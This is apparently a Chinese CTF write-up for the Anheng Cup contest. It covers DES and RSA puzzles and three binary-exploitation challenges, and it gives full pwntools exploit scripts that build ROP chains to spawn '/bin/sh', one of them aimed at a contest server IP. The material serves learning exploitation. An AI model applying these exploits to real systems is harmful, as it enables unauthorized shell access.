• #### 安恒杯_writeup

下面为比赛中做出的题目

MISC: SHOW ME THE FLAG-by-cyyzore

CRYPTO: LAZYATTACK-by-GoldsNow

这一题非常巧。所有的队伍里面仅仅有我们一个队伍将其做出来。

这一题做出来完全然全是靠运气,在当我做出这一题的时候感觉是懵逼的,全然不知道是怎么回事,flag一下子就出来了并且对了,非常兴奋。队友都相互说用了和出题人同一个软件,才得到的答案。结果确实是和出题人用了同一个软件。

首先,因为巧合。师兄说了C语言跑的会比python快,然后去网上找C语言的DES解密代码。于是乎在网上找了两个版本号的DES解密。一种仅仅能解决8位

明文与8位密钥的算法。然后果断扔掉。

另一个版本号就是和出题人一样的。预计出题人也是网上拉的代码。

看都不看的,加密解密验证一下就出题目了。

因为懒得改动程序,就新建了key.txt (这个也奠定了能够得到flag的基础。) 其实密钥 就是key.txt。只是一定要用C语言来解密,其它的语言解密无效。

DES解密程序的主函数例如以下

int main()
{
DES_Encrypt("1.txt","key.txt","2.txt");
system("pause");
DES_Decrypt("2.txt","key.txt","3.txt");
getchar();
return 0;
}

注:这个是刚刚下载下来的时候的代码。

1.txt 是须要加密的文字,key.txt就是密钥!

密钥。。

2.txt 是加密后的文字。3.txt是解密后的文字。

题目错误分析过程:

一、 解密程序。

①当key.txt里面什么都不写的时候。

②当key.txt里面随便乱填的时候。

③当key.txt名称换成key1.txt且里面什么都不填的时候

**这个时候就没有flag了!

④当key1.txt乱填的时候:**

和③产生的结果是一样的。

二、同理生成代码的程序

相同的效果。不反复描写叙述了。

三、代码分析

出题人使用的DES源代码:DOWNLOAD IT!

CRYPTO:RSAROLL-by-wintersun

题目提示说不要用微软的notepad。机智的我。果断没用。

  1. 使用notapad++打开文件。

    例如以下

  1. 使用RSATOOLS爆破密钥(软件放群里了)

  1. 解密代码例如以下
import binascii

# n = 0x367198D6B5614E95813ADD8F22A4717BC72BE1EABD933D1B86944FDB75B8ED230BE62D7D1B69D222095C128C86F82012ECB116191FD9D018A6D02F84DB27BC51A21307DC86F4BF771C691C143E5ABE549B5BD2D6EB1A21FD6270E7E1B48FE0611FBB2E1B0B3524E6F4DE8B4E4A345DA44A13DE825B72608DB6C7C4A40B78266E6C87BBFDEF6B48381D49C4507A58BCD47B76D64B45908B158BD7EBC4DACB0B1CFD6C2C19574F40EB2EFD0E9E10DC7005CAD39BCAF52B9EAC3873368D69031C5E724684A44F068EFD1D3DC096D9B5D6411E58BDEE43E46B99A0D0494B9DB28195AF901AFF130D4A6E203DAD08DA57FA7E40262A5BADB2A323EDA28B44696AB305D
# d = 4221909016509078129201801236879446760697885220928506696150646938237440992746683409881141451831939190609743447676525325543963362353923989076199470515758399L
# c = 0x1e04304936215de8e21965cfca9c245b1a8f38339875d36779c0f123c475bc24d5eef50e7d9ff5830e80c62e8083ec55f27456c80b0ab26546b9aeb8af30e82b650690a2ed7ea407dcd094ab9c9d3d25a93b2140dcebae1814610302896e67f3ae37d108cd029fae6362ea7ac1168974c1a747ec9173799e1107e7a56d783660418ebdf6898d7037cea25867093216c2c702ef3eef71f694a6063f5f0f1179c8a2afe9898ae8dec5bb393cdffa3a52a297cd96d1ea602309ecf47cd009829b44ed3100cf6194510c53c25ca7435f60ce5f4f614cdd2c63756093b848a70aade002d6bc8f316c9e5503f32d39a56193d1d92b697b48f5aa43417631846824b5e86
n = 0x36D837C1
c = '704796792,752211152,274704164,18414022,368270835,483295235,263072905,459788476,483295235,459788476,663551792,475206804,459788476,428313374,475206804,459788476,425392137,704796792,458265677,341524652,483295235,534149509,425392137,428313374,425392137,341524652,458265677,263072905,483295235,828509797,341524652,425392137,475206804,428313374,483295235,475206804,459788476,306220148'
d = 0x5C5CED3
c = c.split(',')
flag=''
for x in c:
m = hex(pow(int(x),d,n)).rstrip("L")
flag+=chr(int(m[2:],16))
print flag
#print binascii.unhexlify('0'+m[2:])
raw_input()
PWN:PWN1-by-wintersun

链接,蒸米的文章

http://drops.wooyun.org/tips/6597

exp第一个改改就能用= =。。

这边题目没有提供libc给我们,可是system函数plt中有了,我们能够直接获取到system函数的地址。如今就还差一个”/bin/sh\0”。

我们能够利用rop,第一发先把”/bin/sh\0”写入到.bbs段,然后再来一发rop。调用system,触发”/bin/sh\0”。须要注意的是。要保持堆栈平衡。

exp例如以下:

#!/usr/bin/env python
from pwn import * elf = ELF('./pwn1')
plt_system = elf.symbols['system']
plt_scanf = elf.symbols['__isoc99_scanf']
vulfun_addr = 0x080485FD
p = remote('114.55.7.125',8000)
#p = process('./pwn1')
#p = remote('127.0.0.1', 10003) print "system_addr=" + hex(plt_system)
bss_addr = 0x0804a040
ppr = 0x80487ad
_256s = 0x0804888F
print repr(p.recvuntil(':'))
payload = 'a'*140 + p32(plt_scanf) + p32(ppr) + p32(_256s)+ p32(bss_addr)
payload += p32(plt_system) + p32(vulfun_addr) + p32(bss_addr)
print "\n###sending payload ...###"
p.sendline(payload)
print repr(p.recvuntil(':'))
raw_input()
p.sendline('1')
print repr(p.recvuntil('\n'))
p.sendline("/bin/sh\0") p.interactive()

我是切割线


我是切割线

下面是赛后解出的题目(各种參考资料。。)

PWN:PWN2

使用 file pwn2 查看elf文件信息。

pwn2: ELF 32-bit LSB executable, Intel 80386, version 1
(GNU/Linux), statically linked, for GNU/Linux 2.6.24,
BuildID[sha1]=0xf6065416aedf59fe9b12d75558caf75e535311bf,
not stripped

这是一个静态编译的文件,没有libc,使用IDA反编译发现,连个system都木有。

程序的简单流程:

首先申请一个内存空间,内存空间的单位为4个字节的int型,这个内存空间的长度由用户决定,这是第一个缺陷。程序提供四种运算。和最后一种保存功能。用户能够通过选择一种运算模式,然后输入x(整型)、y(整型)来进行运算,运算结果会逐个保存至一開始分配的内存空间上。

溢出点在memcpy(&v3, v5, 4 * v4);最后保存结果的时候把用户开辟的超长内存空间段复制到了栈上。。溢出。。

将超长内存空间复制到了栈上。导致栈溢出

法一:通过rop关闭DEP,然后跳转到栈上的shell。运行shell

法二:通过ROPgadget构造出一条能够获得shell的rop。

我们先採使用方法二。

。这比較简单,easy实现。

命令ROPgadget --binary pwn2 --ropchain

嗯。。

生成的ropchain是酱紫的。

#!/usr/bin/env python2
# execve generated by ROPgadget from struct import pack # Padding goes here
p = '' p += pack('<I', 0x0806ed0a) # pop edx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x080bb406) # pop eax ; ret
p += '/bin'
p += pack('<I', 0x080a1dad) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ed0a) # pop edx ; ret
p += pack('<I', 0x080ea064) # @ .data + 4
p += pack('<I', 0x080bb406) # pop eax ; ret
p += '//sh'
p += pack('<I', 0x080a1dad) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x0806ed0a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054730) # xor eax, eax ; ret
p += pack('<I', 0x080a1dad) # mov dword ptr [edx], eax ; ret
p += pack('<I', 0x080481c9) # pop ebx ; ret
p += pack('<I', 0x080ea060) # @ .data
p += pack('<I', 0x0806ed31) # pop ecx ; pop ebx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x080ea060) # padding without overwrite ebx
p += pack('<I', 0x0806ed0a) # pop edx ; ret
p += pack('<I', 0x080ea068) # @ .data + 8
p += pack('<I', 0x08054730) # xor eax, eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x0807b75f) # inc eax ; ret
p += pack('<I', 0x08049781) # int 0x80

这里说一下,因为以往碰到的pwn题目输入都是为字符串,可是这题不一样,输入为整型,有个大小端的问题。

附:

pwn之%s与%d的问题研究。

大小端问题在字符串和整型存储时存在差异

字符串存储时没有大小端的问题,能够看作大端模式。

比方说0x0806ed0a,字符串存储的时候是从低往高的。
1 2 3 4
08 06 6e d0 。!! !然而,ret返回地址是由高向低,小端存储。 所以设置返回地址的时候,必须倒着来 \x0a\xed\x06\x08 这样子输入进去。这样ret才会读成0x0806ed0a,PC跳转到0x0806ed0a这个地址上 整型存储时。使用的是小端模式,数据是从高往低放的。输入0x0806ed0a时。 1 2 3 4
d0 6e d0 08
<切合ret阅读模式> 这个时候ret会直接返回0x0806ed0a

所以我们在放置payload的时候,要注意大小端的问题。

额外情况:

栈空间的计算,main函数默认会多出8个字节的栈空间。

exp例如以下

from pwn import *
context(arch='i386', os='linux', log_level='debug') p = process('./pwn2') ###set memery length
p.recvuntil(':')
p.sendline('255')#the biggest! ### calc reply
def calc(num):
p.recvuntil('result')
p.sendline('1')
p.recvuntil('x:')
p.sendline(str(num))
p.recvuntil('y:')
p.sendline('0')
p.recvuntil('\n')
###pading 16*4 byte
for x in range(11):calc(0x41414141)#44 byte
calc(0)#free v4
for x in range(4):calc(0x41414141) ### ropchain
ropchain = [0x0806ed0a,
0x080ea060,
0x080bb406,
0x6e69622f,
0x080a1dad,
0x0806ed0a,
0x080ea064,
0x080bb406,
0x68732f2f,
0x080a1dad,
0x0806ed0a,
0x080ea068,
0x08054730,
0x080a1dad,
0x080481c9,
0x080ea060,
0x0806ed31,
0x080ea068,
0x080ea060,
0x0806ed0a,
0x080ea068,
0x08054730,
0x0807b75f,
0x0807b75f,
0x0807b75f,
0x0807b75f,
0x0807b75f,
0x0807b75f,
0x0807b75f,
0x0807b75f,
0x0807b75f,
0x0807b75f,
0x0807b75f,
0x08049781] ### send ropchain
for i in ropchain:
calc(i)
### sava and overflow
p.recvuntil('result')
p.sendline('5')
p.interactive()
PWN:PWN3

file查看下,动态编译的文件。

用IDA查看下溢出点在哪。

发现存在整数溢出:数组的索引,用户可控,该索引为有符号整型,存在溢出,在任何位置可写。

可写入最大字节数为 10*4 byte

要用这40 byte 来获得shell

先 scanf 把 “/bin/sh\0”写入至.bbs(8个字节刚刚好——要是不够怎么办?),然后再调用system函数。要注意保持堆栈平衡。

exp例如以下,感觉比pwn2简单。

。没实用到libc.so

#!/usr/bin/env python
from pwn import * context(arch='i386', os='linux', log_level='debug')
libc = ELF('libc.so')
pwn3 = ELF('pwn3') plt_system = pwn3.symbols['system']
plt_scanf = pwn3.symbols['__isoc99_scanf']
print "system_addr=" + hex(plt_system)
print "scanf_addr=" + hex(plt_scanf)
bss_addr = 0x0804a060
ppr = 0x080487de
vulfun_addr = 0x080485E7
_9s = 0x804884b
overflowint = -0x80000000 p = process('./pwn3')
### input name
p.recvuntil('name ')
p.sendline('ws')
### send payload 10 times
def setvalue(index,payload):
p.recvuntil('index')
p.sendline(str(index))
p.recvuntil('value')
p.sendline(str(payload)) ### scanf p %s .bss sys v .bss x x x
ropchain = [
plt_scanf,
ppr,
_9s,
bss_addr,
plt_system,
vulfun_addr,
bss_addr,
0x41414141,
0x41414141
]
i = 14 ### 数组索引是从0開始的。
for x in ropchain:
print overflowint+i
setvalue(overflowint+i,x)
i=i+1
raw_input()
setvalue(overflowint+27,0x41414141)
p.recvuntil('your input\n')
p.sendline("/bin/sh\0")
p.interactive()

【4.29安恒杯】writeup的更多相关文章

  1. 安恒杯 3月线上个人赛WriteUp

    #前言 这次做的还挺多的,只有个Web300没做出来,排名由上次60+进步到这次16名(最后三分钟掉了5名),感觉还是不错的.但是很明显,流量题有很大的运气成分.做完流量题之后还剩一个多小时,水了水M ...

  2. 安恒杯11月月赛web题目-ezsql详细记录

    通过此题目可以学习到 1.通过load_file+like来盲注获取文件内容 2.php魔术方法__get函数的用法 3.bypass  linux命令过滤 题目中给了注册和登录的功能,没有源码泄露 ...

  3. 2021 羊城杯WriteUP

    比赛感受 题目质量挺不错的,不知道题目会不会上buu有机会复现一下,躺了个三等奖,发下队伍的wp Team BinX from GZHU web Checkin_Go 源码下载下来发现是go语言写的 ...

  4. 津门杯WriteUP

    最近很浮躁,好好学习 WEB power_cut 扫目录 index.php <?php class logger{ public $logFile; public $initMsg; publ ...

  5. 2017湖湘杯Writeup

    RE部分 0x01 Re4newer 解题思路: Step1:die打开,发现有upx壳. Step2:脱壳,执行upx -d 文件名即可. Step3:IDA打开,shift+F12看字符串. 点进 ...

  6. 蓝盾杯writeup

    由于比赛时只给了内网,web题目无法复现,这里就简单写一下misc的部分题目 1.眼花了吗 (默默吐槽居然是来自实验吧的原题) 提示:当眼花的时候会显示两张图,可以想到应该是包含双图的情况 用fore ...

  7. 安恒杯2月月赛-应该不是xss

    1. 打开题目一看,是个留言板 2. 查看源码发现有几个js文件 依次打开发现在main.js里存在这样一段代码 3. 访问 /#login是登录的界面,/#chgpass是修改密码的界面,其中修改密 ...

  8. 安恒杯-babysql

    1. 库名 ?id= and extractvalue(,(select group_concat(0x3a,schema_name) from information_schema.schemata ...

  9. 2018安恒杯11月月赛 MISC

    题目放评论了 Numeric password 这次隐写没有按照套路出牌,很强. 记录一下 看来自主学习的能力很有待提高. 打开Numeric password.txt 中华文化博大精深,近日在教小外 ...

随机推荐

  1. 从零开始,学习web前端之HTML5开发

    什么是HTML5 HTML5是HTML最新的修订版本,2014年10月由万维网联盟(W3C)完成标准制定.是下一代 HTML 标准. 为什么要学习HTML5 HTML5定义了一系列新元素,如新语义标签 ...

  2. 215. Kth Largest Element in an Array【Medium】【找到第 k 大的元素】

    Find the kth largest element in an unsorted array. Note that it is the kth largest element in the so ...

  3. 洛谷——P1724 东风谷早苗

    P1724 东风谷早苗 题目描述 在幻想乡,东风谷早苗是以高达控闻名的高中生宅巫女.某一天,早苗终于入手了最新款的钢达姆模型.作为最新的钢达姆,当然有了与以往不同的功能了,那就是它能够自动行走,厉害吧 ...

  4. 【Java多线程】线程池学习

    Java线程池学习 众所周知,Java不仅提供了线程,也提供了线程池库给我们使用,那么今天来学学线程池的具体使用以及线程池基本实现原理分析. ThreadPoolExecutor ThreadPool ...

  5. Linux基础系列-Day8

    Shell编程基础 Shell介绍 Shell俗称壳(用来区别于核),是指“提供使用者使用界面”的软件(命令解析器).它类似于windows下的的cmd.exe.它接收用户命令,然后调用相应的应用程序 ...

  6. Standard Java集合类问题待整理

    1. HashSet.LinkedHashSet和TreeSet HashSet采用散列函数对元素进行排序,是专门为快速查询而设计的.存入HashSet的对象必须定义hashCode方法. TreeS ...

  7. [BZOJ1860][ZJOI2006]Mahjong(DP)

    1860: [Zjoi2006]Mahjong麻将 Time Limit: 1 Sec  Memory Limit: 64 MBSubmit: 412  Solved: 248[Submit][Sta ...

  8. 【推导】计蒜客17119 2017 ACM-ICPC 亚洲区(西安赛区)网络赛 F. Trig Function

    题意:给你n,m,让你求cos(nx)的展开式的(cos(x))^m项的系数. 更一般的式子是这样的:. 队友的代码: #include<cstdio> #include<algor ...

  9. 【回文自动机】bzoj3676 [Apio2014]回文串

    回文自动机讲解!http://blog.csdn.net/u013368721/article/details/42100363 pam上每个点代表本质不同的回文子串.len(i)代表长度,cnt(i ...

  10. bzoj 4412: [Usaco2016 Feb]Circular Barn

    4412: [Usaco2016 Feb]Circular Barn Description 有一个N个点的环,相邻两个点距离是1.点顺时针标号为1..N.每一个点有ci头牛,保证∑ci=N.每头牛都 ...